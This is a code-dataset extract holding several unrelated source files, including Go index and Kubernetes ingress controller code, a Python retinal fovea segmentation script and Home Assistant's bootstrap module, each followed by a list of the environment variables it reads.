return camtypes.ImageInfo{}, fmt.Errorf("index: bogus key %q = %q", key, v)
}
return ii, nil
}
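// GetMediaTags returns the media metadata (e.g. audio tags) indexed for the
// file schema blob fileRef.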
func (x *Index) GetMediaTags(fileRef blob.Ref) (tags map[string]string, err error) {
if x.corpus != nil {
return x.corpus.GetMediaTags(fileRef)
}
	tags = make(map[string]string) // the named return starts nil; writing to a nil map would panic
	it := x.queryPrefix(keyMediaTag, fileRef.String())
defer closeIterator(it, &err)
for it.Next() {
tags[it.Key()] = it.Value()
}
return tags, nil
}
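// EdgesTo returns the edges that reference ref, keeping at most one edge per
// referencing permanode.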
func (x *Index) EdgesTo(ref blob.Ref, opts *camtypes.EdgesToOpts) (edges []*camtypes.Edge, err error) {
it := x.queryPrefix(keyEdgeBackward, ref)
defer closeIterator(it, &err)
permanodeParents := make(map[string]*camtypes.Edge)
for it.Next() {
edge, ok := kvEdgeBackward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(edge.From) {
continue
}
if x.IsDeleted(edge.BlobRef) {
continue
}
edge.To = ref
if edge.FromType == "permanode" {
permanodeParents[edge.From.String()] = edge
} else {
edges = append(edges, edge)
}
}
for _, e := range permanodeParents {
edges = append(edges, e)
}
return edges, nil
}
func kvEdgeBackward(k, v string) (edge *camtypes.Edge, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 4 || len(valPart) != 2 {
// TODO(mpl): use glog
log.Printf("bogus keyEdgeBackward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "edgeback" {
return
}
parentRef, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus parent in keyEdgeBackward index entry: %q", keyPart[2])
return
}
blobRef, ok := blob.Parse(keyPart[3])
if !ok {
log.Printf("bogus blobref in keyEdgeBackward index entry: %q", keyPart[3])
return
}
return &camtypes.Edge{
From: parentRef,
FromType: valPart[0],
FromTitle: valPart[1],
BlobRef: blobRef,
}, true
}
// GetDirMembers sends on dest the children of the static directory dir.
func (x *Index) GetDirMembers(dir blob.Ref, dest chan<- blob.Ref, limit int) (err error) {
defer close(dest)
sent := 0
it := x.queryPrefix(keyStaticDirChild, dir.String())
defer closeIterator(it, &err)
for it.Next() {
keyPart := strings.Split(it.Key(), "|")
if len(keyPart) != 3 {
return fmt.Errorf("index: bogus key keyStaticDirChild = %q", it.Key())
}
child, ok := blob.Parse(keyPart[2])
if !ok {
continue
}
dest <- child
sent++
if sent == limit {
break
}
}
return nil
}
func kvBlobMeta(k, v string) (bm camtypes.BlobMeta, ok bool) {
refStr := k[len("meta:"):]
br, ok := blob.Parse(refStr)
if !ok {
return
}
pipe := strings.Index(v, "|")
if pipe < 0 {
return
}
size, err := strconv.ParseUint(v[:pipe], 10, 32)
if err != nil {
return
}
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME(v[pipe+1:]),
}, true
}
func kvBlobMeta_bytes(k, v []byte) (bm camtypes.BlobMeta, ok bool) {
ref := k[len("meta:"):]
br, ok := blob.ParseBytes(ref)
if !ok {
return
}
pipe := bytes.IndexByte(v, '|')
if pipe < 0 {
return
}
size, err := strutil.ParseUintBytes(v[:pipe], 10, 32)
if err != nil {
return
}
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME_bytes(v[pipe+1:]),
}, true
}
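// enumerateBlobMeta calls cb for every blob meta row in s, stopping at the
// first error returned by cb.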
func enumerateBlobMeta(s sorted.KeyValue, cb func(camtypes.BlobMeta) error) (err error) {
it := queryPrefixString(s, "meta:")
defer closeIterator(it, &err)
for it.Next() {
bm, ok := kvBlobMeta(it.Key(), it.Value())
if !ok {
continue
}
if err := cb(bm); err != nil {
return err
}
}
return nil
}
func enumerateSignerKeyId(s sorted.KeyValue, cb func(blob.Ref, string)) (err error) {
const pfx = "signerkeyid:"
it := queryPrefixString(s, pfx)
defer closeIterator(it, &err)
for it.Next() {
if br, ok := blob.Parse(strings.TrimPrefix(it.Key(), pfx)); ok {
cb(br, it.Value())
}
}
return
}
// EnumerateBlobMeta sends all metadata about all known blobs to ch and then closes ch.
func (x *Index) EnumerateBlobMeta(ctx *context.Context, ch chan<- camtypes.BlobMeta) (err error) {
if x.corpus != nil {
x.corpus.RLock()
defer x.corpus.RUnlock()
return x.corpus.EnumerateBlobMetaLocked(ctx, ch)
}
defer close(ch)
return enumerateBlobMeta(x.s, func(bm camtypes.BlobMeta) error {
select {
case ch <- bm:
case <-ctx.Done():
return context.ErrCanceled
}
return nil
})
}
// Storage returns the index's underlying Storage implementation.
func (x *Index) Storage() sorted.KeyValue { return x.s }
// Close closes the underlying sorted.KeyValue, if the storage has a Close method.
// The return value is the return value of the underlying Close, or
// nil otherwise.
func (x *Index) Close() error {
	close(x.tickleOoo)
	if cl, ok := x.s.(io.Closer); ok {
		return cl.Close()
	}
return nil
}
// initNeededMaps initializes x.needs and x.neededBy on start-up.
func (x *Index) initNeededMaps() (err error) {
x.deletes = newDeletionCache()
it := x.queryPrefix(keyMissing)
defer closeIterator(it, &err)
for it.Next() {
key := it.KeyBytes()
pair := key[len("missing|"):]
pipe := bytes.IndexByte(pair, '|')
if pipe < 0 {
return fmt.Errorf("Bogus missing key %q", key)
}
have, ok1 := blob.ParseBytes(pair[:pipe])
missing, ok2 := blob.ParseBytes(pair[pipe+1:])
if !ok1 || !ok2 {
return fmt.Errorf("Bogus missing key %q", key)
}
x.noteNeededMemory(have, missing)
}
return
}
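// noteNeeded records, both in storage and in memory, that blob have cannot be
// fully indexed until blob missing is received.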
func (x *Index) noteNeeded(have, missing blob.Ref) error {
if err := x.s.Set(keyMissing.Key(have, missing), "1"); err != nil {
return err
}
x.noteNeededMemory(have, missing)
return nil
}
func (x *Index) noteNeededMemory(have, missing blob.Ref) {
x.mu.Lock()
x.needs[have] = append(x.needs[have], missing)
x.neededBy[missing] = append(x.neededBy[missing], have)
x.mu.Unlock()
}
const camliTypeMIMEPrefix = "application/json; camliType="
var camliTypeMIMEPrefixBytes = []byte(camliTypeMIMEPrefix)
// "application/json; camliType=file" => "file"
// "image/gif" => ""
func camliTypeFromMIME(mime string) string {
if v := strings.TrimPrefix(mime, camliTypeMIMEPrefix); v != mime {
return v
}
return ""
}
func camliTypeFromMIME_bytes(mime []byte) string {
if v := bytes.TrimPrefix(mime, camliTypeMIMEPrefixBytes); len(v) != len(mime) {
return strutil.StringFromBytes(v)
}
return ""
}
// TODO(bradfitz): rename this? This is really about signer-attr-value
// (PermanodeOfSignerAttrValue), and not about indexed attributes in general.
func IsIndexedAttribute(attr string) bool {
switch attr {
case "camliRoot", "camliImportRoot", "tag", "title":
return true
}
return false
}
// IsBlobReferenceAttribute returns whether attr is an attribute whose
// value is a blob reference (e.g. camliMember) and thus something the
// indexers should keep inverted indexes on for parent/child-type
// relationships.
func IsBlobReferenceAttribute(attr string) bool {
switch attr {
case "camliMember":
return true
}
return false
}
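// IsFulltextAttribute reports whether values of attr should be full-text indexed.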
func IsFulltextAttribute(attr string) bool {
switch attr {
case "tag", "title":
return true
}
return false
}
|
[
"\"CAMLI_TESTREINDEX_DISABLE_OOO\"",
"\"CAMLI_REINDEX_START\""
] |
[] |
[
"CAMLI_TESTREINDEX_DISABLE_OOO",
"CAMLI_REINDEX_START"
] |
[]
|
["CAMLI_TESTREINDEX_DISABLE_OOO", "CAMLI_REINDEX_START"]
|
go
| 2 | 0 | |
cmd/contour/contour.go
|
// Copyright © 2017 Heptio
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"flag"
"fmt"
"net"
"os"
"path/filepath"
"strconv"
"strings"
clientset "github.com/heptio/contour/apis/generated/clientset/versioned"
"github.com/heptio/contour/internal/contour"
"github.com/heptio/contour/internal/debug"
"github.com/heptio/contour/internal/envoy"
"github.com/heptio/contour/internal/grpc"
"github.com/heptio/contour/internal/httpsvc"
"github.com/heptio/contour/internal/k8s"
"github.com/heptio/contour/internal/metrics"
"github.com/heptio/workgroup"
"github.com/prometheus/client_golang/prometheus"
"github.com/sirupsen/logrus"
kingpin "gopkg.in/alecthomas/kingpin.v2"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
)
var ingressrouteRootNamespaceFlag string
func main() {
log := logrus.StandardLogger()
app := kingpin.New("contour", "Heptio Contour Kubernetes ingress controller.")
var config envoy.BootstrapConfig
bootstrap := app.Command("bootstrap", "Generate bootstrap configuration.")
path := bootstrap.Arg("path", "Configuration file.").Required().String()
bootstrap.Flag("admin-address", "Envoy admin interface address").StringVar(&config.AdminAddress)
bootstrap.Flag("admin-port", "Envoy admin interface port").IntVar(&config.AdminPort)
bootstrap.Flag("stats-address", "Envoy /stats interface address").StringVar(&config.StatsAddress)
bootstrap.Flag("stats-port", "Envoy /stats interface port").IntVar(&config.StatsPort)
bootstrap.Flag("xds-address", "xDS gRPC API address").StringVar(&config.XDSAddress)
bootstrap.Flag("xds-port", "xDS gRPC API port").IntVar(&config.XDSGRPCPort)
bootstrap.Flag("statsd-enabled", "enable statsd output").BoolVar(&config.StatsdEnabled)
bootstrap.Flag("statsd-address", "statsd address").StringVar(&config.StatsdAddress)
bootstrap.Flag("statsd-port", "statsd port").IntVar(&config.StatsdPort)
cli := app.Command("cli", "A CLI client for the Heptio Contour Kubernetes ingress controller.")
var client Client
cli.Flag("contour", "contour host:port.").Default("127.0.0.1:8001").StringVar(&client.ContourAddr)
var resources []string
cds := cli.Command("cds", "watch services.")
cds.Arg("resources", "CDS resource filter").StringsVar(&resources)
eds := cli.Command("eds", "watch endpoints.")
eds.Arg("resources", "EDS resource filter").StringsVar(&resources)
	lds := cli.Command("lds", "watch listeners.")
lds.Arg("resources", "LDS resource filter").StringsVar(&resources)
rds := cli.Command("rds", "watch routes.")
rds.Arg("resources", "RDS resource filter").StringsVar(&resources)
serve := app.Command("serve", "Serve xDS API traffic")
inCluster := serve.Flag("incluster", "use in cluster configuration.").Bool()
	kubeconfig := serve.Flag("kubeconfig", "path to kubeconfig (if not running inside a cluster)").Default(filepath.Join(os.Getenv("HOME"), ".kube", "config")).String()
xdsAddr := serve.Flag("xds-address", "xDS gRPC API address").Default("127.0.0.1").String()
xdsPort := serve.Flag("xds-port", "xDS gRPC API port").Default("8001").Int()
ch := contour.CacheHandler{
FieldLogger: log.WithField("context", "CacheHandler"),
}
metricsvc := metrics.Service{
Service: httpsvc.Service{
FieldLogger: log.WithField("context", "metricsvc"),
},
}
registry := prometheus.NewRegistry()
metricsvc.Registry = registry
	// register default process / go collectors
registry.MustRegister(prometheus.NewProcessCollector(prometheus.ProcessCollectorOpts{}))
registry.MustRegister(prometheus.NewGoCollector())
// register our custom metrics
metrics := metrics.NewMetrics(registry)
reh := contour.ResourceEventHandler{
FieldLogger: log.WithField("context", "resourceEventHandler"),
Notifier: &contour.HoldoffNotifier{
Notifier: &ch,
FieldLogger: log.WithField("context", "HoldoffNotifier"),
Metrics: metrics,
},
}
// configuration parameters for debug service
debugsvc := debug.Service{
Service: httpsvc.Service{
FieldLogger: log.WithField("context", "debugsvc"),
},
// plumb the DAGAdapter's Builder through
// to the debug handler
Builder: &reh.Builder,
}
serve.Flag("debug-http-address", "address the debug http endpoint will bind too").Default("127.0.0.1").StringVar(&debugsvc.Addr)
serve.Flag("debug-http-port", "port the debug http endpoint will bind too").Default("6060").IntVar(&debugsvc.Port)
serve.Flag("http-address", "address the metrics http endpoint will bind too").Default("0.0.0.0").StringVar(&metricsvc.Addr)
serve.Flag("http-port", "port the metrics http endpoint will bind too").Default("8000").IntVar(&metricsvc.Port)
serve.Flag("envoy-http-access-log", "Envoy HTTP access log").Default(contour.DEFAULT_HTTP_ACCESS_LOG).StringVar(&ch.HTTPAccessLog)
serve.Flag("envoy-https-access-log", "Envoy HTTPS access log").Default(contour.DEFAULT_HTTPS_ACCESS_LOG).StringVar(&ch.HTTPSAccessLog)
serve.Flag("envoy-external-http-port", "External port for HTTP requests").Default("80").IntVar(&reh.ExternalInsecurePort)
serve.Flag("envoy-external-https-port", "External port for HTTPS requests").Default("443").IntVar(&reh.ExternalSecurePort)
serve.Flag("envoy-service-http-address", "Kubernetes Service address for HTTP requests").Default("0.0.0.0").StringVar(&ch.HTTPAddress)
serve.Flag("envoy-service-https-address", "Kubernetes Service address for HTTPS requests").Default("0.0.0.0").StringVar(&ch.HTTPSAddress)
serve.Flag("envoy-service-http-port", "Kubernetes Service port for HTTP requests").Default("8080").IntVar(&ch.HTTPPort)
serve.Flag("envoy-service-https-port", "Kubernetes Service port for HTTPS requests").Default("8443").IntVar(&ch.HTTPSPort)
serve.Flag("use-proxy-protocol", "Use PROXY protocol for all listeners").BoolVar(&ch.UseProxyProto)
serve.Flag("ingress-class-name", "Contour IngressClass name").StringVar(&reh.IngressClass)
serve.Flag("ingressroute-root-namespaces", "Restrict contour to searching these namespaces for root ingress routes").StringVar(&ingressrouteRootNamespaceFlag)
args := os.Args[1:]
switch kingpin.MustParse(app.Parse(args)) {
case bootstrap.FullCommand():
writeBootstrapConfig(&config, *path)
case cds.FullCommand():
stream := client.ClusterStream()
watchstream(stream, clusterType, resources)
case eds.FullCommand():
stream := client.EndpointStream()
watchstream(stream, endpointType, resources)
case lds.FullCommand():
stream := client.ListenerStream()
watchstream(stream, listenerType, resources)
case rds.FullCommand():
stream := client.RouteStream()
watchstream(stream, routeType, resources)
case serve.FullCommand():
log.Infof("args: %v", args)
var g workgroup.Group
// client-go uses glog which requires initialisation as a side effect of calling
// flag.Parse (see #118 and https://github.com/golang/glog/blob/master/glog.go#L679)
// However kingpin owns our flag parsing, so we defer calling flag.Parse until
		// this point to keep the Go flag package from rejecting flags which are defined
// in kingpin. See #371
flag.Parse()
reh.IngressRouteRootNamespaces = parseRootNamespaces(ingressrouteRootNamespaceFlag)
client, contourClient := newClient(*kubeconfig, *inCluster)
wl := log.WithField("context", "watch")
k8s.WatchServices(&g, client, wl, &reh)
k8s.WatchIngress(&g, client, wl, &reh)
k8s.WatchSecrets(&g, client, wl, &reh)
k8s.WatchIngressRoutes(&g, contourClient, wl, &reh)
ch.IngressRouteStatus = &k8s.IngressRouteStatus{
Client: contourClient,
}
// Endpoints updates are handled directly by the EndpointsTranslator
// due to their high update rate and their orthogonal nature.
et := &contour.EndpointsTranslator{
FieldLogger: log.WithField("context", "endpointstranslator"),
}
k8s.WatchEndpoints(&g, client, wl, et)
ch.Metrics = metrics
reh.Metrics = metrics
g.Add(debugsvc.Start)
g.Add(metricsvc.Start)
g.Add(func(stop <-chan struct{}) error {
log := log.WithField("context", "grpc")
addr := net.JoinHostPort(*xdsAddr, strconv.Itoa(*xdsPort))
l, err := net.Listen("tcp", addr)
if err != nil {
return err
}
// Resource types in xDS v2.
const (
googleApis = "type.googleapis.com/"
typePrefix = googleApis + "envoy.api.v2."
endpointType = typePrefix + "ClusterLoadAssignment"
clusterType = typePrefix + "Cluster"
routeType = typePrefix + "RouteConfiguration"
listenerType = typePrefix + "Listener"
)
s := grpc.NewAPI(log, map[string]grpc.Cache{
clusterType: &ch.ClusterCache,
routeType: &ch.RouteCache,
listenerType: &ch.ListenerCache,
endpointType: et,
})
log.Println("started")
defer log.Println("stopped")
return s.Serve(l)
})
g.Run()
default:
app.Usage(args)
os.Exit(2)
}
}
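// newClient returns Kubernetes and Contour clientsets built from the supplied
// kubeconfig path, or from the in-cluster configuration when inCluster is true
// or no kubeconfig is given.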
func newClient(kubeconfig string, inCluster bool) (*kubernetes.Clientset, *clientset.Clientset) {
var err error
var config *rest.Config
if kubeconfig != "" && !inCluster {
config, err = clientcmd.BuildConfigFromFlags("", kubeconfig)
check(err)
} else {
config, err = rest.InClusterConfig()
check(err)
}
client, err := kubernetes.NewForConfig(config)
check(err)
contourClient, err := clientset.NewForConfig(config)
check(err)
return client, contourClient
}
func check(err error) {
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(1)
}
}
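// parseRootNamespaces splits the comma separated list rn into namespace names,
// trimming surrounding whitespace. It returns nil for an empty string.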
func parseRootNamespaces(rn string) []string {
if rn == "" {
return nil
}
var ns []string
for _, s := range strings.Split(rn, ",") {
ns = append(ns, strings.TrimSpace(s))
}
return ns
}
|
[
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
predict_Fovea_seg_stage1.py
|
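"""Stage-1 fovea segmentation inference.

Ensembles five U-Net folds with multi-scale and flip/gamma test-time
augmentation, writes the thresholded masks as PNG files, and saves the fovea
centroid coordinates to a CSV file.
"""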
import os
import numpy as np
import torch
import math
import segmentation_models_pytorch as smp
import pickle
import cv2
import argparse
from utils import remove_small_areas, keep_large_area
from skimage import exposure, io
import torch.nn as nn
from skimage.measure import *
import pandas as pd
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=int, default=0, help='which gpu is used')
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
new_dir = 'data/challenge/val/Fovea/stage1'
test_name_list = os.listdir('data/challenge/val/img')
input_size = [(384, 384), (512, 512), (640, 640)]
os.makedirs(new_dir, exist_ok=True)
os.makedirs(os.path.join(new_dir, 'predictions'), exist_ok=True)
model_paths = ['/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold0/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold1/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold2/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold3/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold4/best_dice.pth']
ImageName = []
Fovea_X = []
Fovea_Y = []
predictions_list = []
repeat_list = [0] * len(test_name_list)
for name in test_name_list:
img = cv2.imread(os.path.join('data/challenge/val/img', name), 0)
predictions_list.append(np.zeros(img.shape))
with torch.no_grad():
for model_path in model_paths:
if 'resnet34' in model_path:
net = smp.Unet('resnet34', in_channels=3, classes=1, activation=None, encoder_weights=None).cuda()
if 'resnet101' in model_path:
net = smp.Unet('resnet101', in_channels=3, classes=1, activation=None, encoder_weights=None).cuda()
net.load_state_dict(torch.load(model_path))
net.eval()
for i, name in enumerate(test_name_list):
print(i, name)
img = io.imread(os.path.join('data/challenge/val/img', name)) / 255
repeat = 0
pred_logits = np.zeros((img.shape[0], img.shape[1]))
for s in input_size:
img_resized = cv2.resize(img, (s[1], s[0]))
for t in range(4):
if t == 0:
img_resized_tta = np.flip(img_resized, axis=0)
if t == 1:
img_resized_tta = exposure.adjust_gamma(img_resized, 1.2)
if t == 2:
img_resized_tta = exposure.adjust_gamma(img_resized, 0.8)
if t == 3:
img_resized_tta = img_resized
img_resized_tta = np.ascontiguousarray(img_resized_tta)
data_one_tensor = torch.from_numpy(img_resized_tta).permute(2, 0, 1).unsqueeze(0).float().cuda()
predict_one_tensor = net(data_one_tensor)
predict_one_tensor = torch.sigmoid(predict_one_tensor)
predict_one_array = predict_one_tensor.cpu().squeeze(0).squeeze(0).detach().numpy()
if t == 0:
predict_one_array = np.flip(predict_one_array, axis=0)
if predict_one_array.max() > 0.5:
repeat += 1
predict_one_array = cv2.resize(predict_one_array, (img.shape[1], img.shape[0]))
pred_logits += predict_one_array
if repeat > 0:
pred_logits /= repeat
predictions_list[i] += pred_logits
repeat_list[i] += 1
for i, name in enumerate(test_name_list):
if repeat_list[i] > 0:
predictions_list[i] /= repeat_list[i]
_, predictions_list[i] = cv2.threshold(predictions_list[i], 0.5, 1, 0)
predictions_list[i] = keep_large_area(predictions_list[i], 1)
    cv2.imwrite(os.path.join(new_dir, 'predictions', os.path.splitext(name)[0] + '.png'), predictions_list[i] * 255)
prediction = predictions_list[i].astype(np.uint8)
connect_regions = label(prediction, connectivity=1, background=0)
props = regionprops(connect_regions)
Fovea_y, Fovea_x = props[0].centroid
Fovea_x = round(Fovea_x, 2)
Fovea_y = round(Fovea_y, 2)
ImageName.append(name)
Fovea_X.append(Fovea_x)
Fovea_Y.append(Fovea_y)
save = pd.DataFrame({'ImageName': ImageName, 'Fovea_X': Fovea_X, 'Fovea_Y': Fovea_Y})
save.to_csv(os.path.join(new_dir, 'fovea_location_results.csv'), index=False)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
Source/apiServer/locate/locate.go
|
// Package locate finds the data servers that hold an object's shards.
package locate
import (
"encoding/json"
"lib/rabbitmq"
"lib/rs"
"lib/types"
"os"
"time"
)
// Locate publishes a locate request for name to the message queue and collects the shard locations reported by the data servers.
func Locate(name string) (locateInfo map[int]string) {
q := rabbitmq.New(os.Getenv("RABBITMQ_SERVER"))
q.Publish("dataServers", name)
c := q.Consume()
go func() {
time.Sleep(time.Second)
q.Close()
}()
locateInfo = make(map[int]string)
for i := 0; i < rs.ALL_SHARDS; i++ {
msg := <-c
if len(msg.Body) == 0 {
return
}
var info types.LocateMessage
json.Unmarshal(msg.Body, &info)
locateInfo[info.Id] = info.Addr
}
return
}
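// Exist reports whether enough shards of name can be located to recover the object.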
func Exist(name string) bool {
return len(Locate(name)) >= rs.DATA_SHARDS
}
|
[
"\"RABBITMQ_SERVER\""
] |
[] |
[
"RABBITMQ_SERVER"
] |
[]
|
["RABBITMQ_SERVER"]
|
go
| 1 | 0 | |
homeassistant/bootstrap.py
|
"""Provide methods to bootstrap a Home Assistant instance."""
import asyncio
from collections import OrderedDict
import logging
import logging.handlers
import os
import sys
from time import time
from typing import Any, Dict, Optional, Set
import voluptuous as vol
from homeassistant import config as conf_util, config_entries, core, loader
from homeassistant.const import EVENT_HOMEASSISTANT_CLOSE
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
from homeassistant.util.logging import AsyncHandler
from homeassistant.util.package import async_get_user_site, is_virtual_env
from homeassistant.util.yaml import clear_secret_cache
_LOGGER = logging.getLogger(__name__)
ERROR_LOG_FILENAME = "home-assistant.log"
# hass.data key for logging information.
DATA_LOGGING = "logging"
DEBUGGER_INTEGRATIONS = {"ptvsd"}
CORE_INTEGRATIONS = ("homeassistant", "persistent_notification")
LOGGING_INTEGRATIONS = {"logger", "system_log"}
STAGE_1_INTEGRATIONS = {
# To record data
"recorder",
# To make sure we forward data to other instances
"mqtt_eventstream",
# To provide account link implementations
"cloud",
}
async def async_from_config_dict(
config: Dict[str, Any],
hass: core.HomeAssistant,
config_dir: Optional[str] = None,
enable_log: bool = True,
verbose: bool = False,
skip_pip: bool = False,
log_rotate_days: Any = None,
log_file: Any = None,
log_no_color: bool = False,
) -> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
Dynamically loads required components and its dependencies.
This method is a coroutine.
"""
start = time()
if enable_log:
async_enable_logging(hass, verbose, log_rotate_days, log_file, log_no_color)
hass.config.skip_pip = skip_pip
if skip_pip:
_LOGGER.warning(
"Skipping pip installation of required modules. " "This may cause issues"
)
core_config = config.get(core.DOMAIN, {})
try:
await conf_util.async_process_ha_core_config(hass, core_config)
except vol.Invalid as config_err:
conf_util.async_log_exception(config_err, "homeassistant", core_config, hass)
return None
except HomeAssistantError:
_LOGGER.error(
"Home Assistant core failed to initialize. "
"Further initialization aborted"
)
return None
# Make a copy because we are mutating it.
config = OrderedDict(config)
# Merge packages
await conf_util.merge_packages_config(
hass, config, core_config.get(conf_util.CONF_PACKAGES, {})
)
hass.config_entries = config_entries.ConfigEntries(hass, config)
await hass.config_entries.async_initialize()
await _async_set_up_integrations(hass, config)
stop = time()
_LOGGER.info("Home Assistant initialized in %.2fs", stop - start)
if sys.version_info[:3] < (3, 7, 0):
msg = (
"Python 3.6 support is deprecated and will "
"be removed in the first release after December 15, 2019. Please "
"upgrade Python to 3.7.0 or higher."
)
_LOGGER.warning(msg)
hass.components.persistent_notification.async_create(
msg, "Python version", "python_version"
)
return hass
async def async_from_config_file(
config_path: str,
hass: core.HomeAssistant,
verbose: bool = False,
skip_pip: bool = True,
log_rotate_days: Any = None,
log_file: Any = None,
log_no_color: bool = False,
) -> Optional[core.HomeAssistant]:
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter.
This method is a coroutine.
"""
# Set config dir to directory holding config file
config_dir = os.path.abspath(os.path.dirname(config_path))
hass.config.config_dir = config_dir
if not is_virtual_env():
await async_mount_local_lib_path(config_dir)
async_enable_logging(hass, verbose, log_rotate_days, log_file, log_no_color)
await hass.async_add_executor_job(conf_util.process_ha_config_upgrade, hass)
try:
config_dict = await hass.async_add_executor_job(
conf_util.load_yaml_config_file, config_path
)
except HomeAssistantError as err:
_LOGGER.error("Error loading %s: %s", config_path, err)
return None
finally:
clear_secret_cache()
return await async_from_config_dict(
config_dict, hass, enable_log=False, skip_pip=skip_pip
)
@core.callback
def async_enable_logging(
hass: core.HomeAssistant,
verbose: bool = False,
log_rotate_days: Optional[int] = None,
log_file: Optional[str] = None,
log_no_color: bool = False,
) -> None:
"""Set up the logging.
This method must be run in the event loop.
"""
fmt = "%(asctime)s %(levelname)s (%(threadName)s) " "[%(name)s] %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
if not log_no_color:
try:
from colorlog import ColoredFormatter
# basicConfig must be called after importing colorlog in order to
            # ensure that the handlers it sets up wrap the correct streams.
logging.basicConfig(level=logging.INFO)
colorfmt = f"%(log_color)s{fmt}%(reset)s"
logging.getLogger().handlers[0].setFormatter(
ColoredFormatter(
colorfmt,
datefmt=datefmt,
reset=True,
log_colors={
"DEBUG": "cyan",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red",
},
)
)
except ImportError:
pass
    # If the above initialization failed for any reason, set up the default
    # formatting. If the above succeeds, this will result in a no-op.
logging.basicConfig(format=fmt, datefmt=datefmt, level=logging.INFO)
# Suppress overly verbose logs from libraries that aren't helpful
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("aiohttp.access").setLevel(logging.WARNING)
# Log errors to a file if we have write access to file or config dir
if log_file is None:
err_log_path = hass.config.path(ERROR_LOG_FILENAME)
else:
err_log_path = os.path.abspath(log_file)
err_path_exists = os.path.isfile(err_log_path)
err_dir = os.path.dirname(err_log_path)
# Check if we can write to the error log if it exists or that
# we can create files in the containing directory if not.
if (err_path_exists and os.access(err_log_path, os.W_OK)) or (
not err_path_exists and os.access(err_dir, os.W_OK)
):
if log_rotate_days:
err_handler: logging.FileHandler = logging.handlers.TimedRotatingFileHandler(
err_log_path, when="midnight", backupCount=log_rotate_days
)
else:
err_handler = logging.FileHandler(err_log_path, mode="w", delay=True)
err_handler.setLevel(logging.INFO if verbose else logging.WARNING)
err_handler.setFormatter(logging.Formatter(fmt, datefmt=datefmt))
async_handler = AsyncHandler(hass.loop, err_handler)
async def async_stop_async_handler(_: Any) -> None:
"""Cleanup async handler."""
logging.getLogger("").removeHandler(async_handler) # type: ignore
await async_handler.async_close(blocking=True)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, async_stop_async_handler)
logger = logging.getLogger("")
logger.addHandler(async_handler) # type: ignore
logger.setLevel(logging.INFO)
# Save the log file location for access by other components.
hass.data[DATA_LOGGING] = err_log_path
else:
_LOGGER.error("Unable to set up error log %s (access denied)", err_log_path)
async def async_mount_local_lib_path(config_dir: str) -> str:
"""Add local library to Python Path.
This function is a coroutine.
"""
deps_dir = os.path.join(config_dir, "deps")
lib_dir = await async_get_user_site(deps_dir)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
@core.callback
def _get_domains(hass: core.HomeAssistant, config: Dict[str, Any]) -> Set[str]:
"""Get domains of components to set up."""
# Filter out the repeating and common config section [homeassistant]
domains = set(key.split(" ")[0] for key in config.keys() if key != core.DOMAIN)
# Add config entry domains
domains.update(hass.config_entries.async_domains())
# Make sure the Hass.io component is loaded
if "HASSIO" in os.environ:
domains.add("hassio")
return domains
async def _async_set_up_integrations(
hass: core.HomeAssistant, config: Dict[str, Any]
) -> None:
"""Set up all the integrations."""
domains = _get_domains(hass, config)
# Start up debuggers. Start these first in case they want to wait.
debuggers = domains & DEBUGGER_INTEGRATIONS
if debuggers:
_LOGGER.debug("Starting up debuggers %s", debuggers)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in debuggers)
)
domains -= DEBUGGER_INTEGRATIONS
# Resolve all dependencies of all components so we can find the logging
# and integrations that need faster initialization.
resolved_domains_task = asyncio.gather(
*(loader.async_component_dependencies(hass, domain) for domain in domains),
return_exceptions=True,
)
# Set up core.
_LOGGER.debug("Setting up %s", CORE_INTEGRATIONS)
if not all(
await asyncio.gather(
*(
async_setup_component(hass, domain, config)
for domain in CORE_INTEGRATIONS
)
)
):
_LOGGER.error(
"Home Assistant core failed to initialize. "
"Further initialization aborted"
)
return
_LOGGER.debug("Home Assistant core initialized")
# Finish resolving domains
for dep_domains in await resolved_domains_task:
# Result is either a set or an exception. We ignore exceptions
# It will be properly handled during setup of the domain.
if isinstance(dep_domains, set):
domains.update(dep_domains)
# setup components
logging_domains = domains & LOGGING_INTEGRATIONS
